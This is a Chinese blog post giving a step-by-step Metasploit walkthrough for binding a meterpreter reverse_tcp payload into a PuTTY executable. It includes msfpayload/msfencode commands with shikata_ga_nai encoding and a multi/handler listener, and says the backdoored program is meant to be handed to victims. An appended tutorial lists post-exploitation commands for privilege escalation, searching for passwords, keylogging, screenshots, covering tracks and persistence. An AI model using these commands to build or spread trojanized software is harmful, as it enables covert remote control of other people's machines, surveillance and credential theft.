meterpreter的攻击载荷使用

meterpreter号称是metasploit里面最牛逼的模块,今天我就使用了一下,下面记录一下过程。我这次试验的主要目的是,把能用的攻击载荷绑定到Putty程序上,当受攻击者打开Putty程序之后,我再通过命令将木马线程迁移到一个不会关闭的进程上,如explorer.exe.然后我就能保证木马进程持续不衰地为我服务了,至于怎么诱导人打开,还有怎么使用这个进程,这是后话,还需要进行后面命令的处理。我先记录目前完成的步骤。

  1. 首先,载入此次所需要用到的攻击载荷:

    root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp O

在这里,要说明的是,我已经把putty.exe的文件拷入到/root/example_01下了(我这里改名为putty_02.exe,其实都一样)。而且操作也是在此文件夹下执行。


2.下一步就是要将攻击载荷植入这个putty_02.exe文件当中,这样它才能产生作用,在执行命令的同时,需要进行相关设置,以便于在执行之后,能向LHOST机器回传信息:

root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=80 R | msfencode -t exe -x /root/example_01/putty_02.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5

使用以上命令,设置攻击机为我的主机:192.168.17.135,使用端口为80,然后将植入后的文件生成为putty_backdoor.exe。

可见,执行成功,攻击载荷成功植入putty_backdoor.exe

将这个putty程序拷贝出虚拟机,然后具体怎么让别人使用,那就是后话了。


3.使用msfcli模式打开那个载荷的坚挺进程,等待有人上钩:

root@bt:/pentest/exploits/framework3# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=80 E

此时,如果在某台肉鸡上面有人点击了你的putty程序,就会有如下状况:


4.至此,彻底进入meterpreter状态。可以利用后面的方法进行控制了。例如,输入shell.获取肉鸡控制。


MeterpreterMetasploit 框架中最常用的 payload(载荷)之一,它提供了一个强大的交互式 shell,可以用于远程控制受感染的主机。下面是一些关于 Meterpreter 的详细教程: 1. 获取 Meterpreter Shell 在 Metasploit 框架中选择一个适当的 exploit,成功获取目标机器的 shell 后,可以使用 Meterpreter payload,使用命令 `use payload/windows/meterpreter/reverse_tcp` 或 `use payload/linux/x86/meterpreter/reverse_tcp`。 2. 基本命令 Meterpreter 支持许多命令,可以使用 `help` 命令查看所有可用的命令。以下是一些常用命令: - `sysinfo`:显示目标系统的基本信息。 - `getuid`:显示当前用户的权限。 - `getsystem`:尝试提升当前用户的权限到系统管理员。 - `ps`:显示当前系统上正在运行的进程。 - `shell`:在目标机器上打开一个交互式 shell。 - `upload`:将本地文件上传到目标机器。 - `download`:将目标机器上的文件下载到本地。 3. 搜索敏感数据 Meterpreter 可以搜索目标机器上的敏感数据,例如密码和敏感文件。使用 `search` 命令,例如 `search -f password.txt`,可以搜索目标机器上所有包含 `password.txt` 的文件。 4. 捕获屏幕截图 Meterpreter 可以通过 `screenshot` 命令捕获目标机器的屏幕截图,并将其保存到攻击者的机器上。 5. 捕获键盘记录 Meterpreter 还可以通过 `keyscan_start` 和 `keyscan_dump` 命令捕获目标机器上的键盘记录。 6. 清除痕迹 Meterpreter 可以通过 `clean_up` 命令清除在目标机器上留下的痕迹,包括删除 Meterpreter 进程、清除日志文件等。 7. 持久化 Meterpreter 还可以通过 `run persistence` 命令在目标机器上创建一个持久化后门,以便攻击者可以在目标机器上保持访问权限。 以上是一些关于 Meterpreter 的基本教程,希望对您有所帮助。但请注意,任何未经授权的攻击行为都是违法的。如果您想学习网络安全,请遵守法律法规,不要进行任何非法活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值